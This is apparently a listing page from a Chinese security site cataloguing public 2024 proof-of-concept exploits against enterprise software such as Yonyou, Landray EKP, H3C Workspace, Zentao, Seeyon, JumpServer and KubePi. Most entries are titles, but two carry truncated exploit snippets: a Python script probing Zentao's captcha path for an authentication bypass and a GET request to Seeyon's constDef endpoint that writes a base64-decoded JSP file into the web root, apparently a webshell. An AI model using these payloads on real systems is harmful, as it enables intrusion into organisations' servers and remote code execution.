2024你懂的 第5页
2024攻防互联网公开POC
用友U9系统DoQuery接口存在SQL注入_秃兔安全
邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞_秃兔安全
蓝凌EKP存在sys_ui_component远程命令执行漏洞_秃兔安全
H3C Workspace 云桌面 远程命令执行漏洞_秃兔安全
禅道研发项⽬管理系统未授权_秃兔安全

禅道研发项⽬管理系统未授权

import requests def check(url):url1 = url+’/misc-captcha-user.html’# url1 = url+’/index.php?m=misc&f=captcha&sessionVar=user’#非伪静态版本按照此格式传参# url2 = url+’/...
秃兔的头像_秃兔安全至尊玉兔秃兔5个月前
04813
金和OA_uploadfileeditorsave接口存在任意文件上传漏洞_秃兔安全
用友 NC Cloud jsinvoke 任意文件上传_秃兔安全
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔5个月前
05413
JumpServer(CVE-2024-29202)Jinin2模板注入漏洞_秃兔安全
KubePi存在JWT token验证绕过漏洞_秃兔安全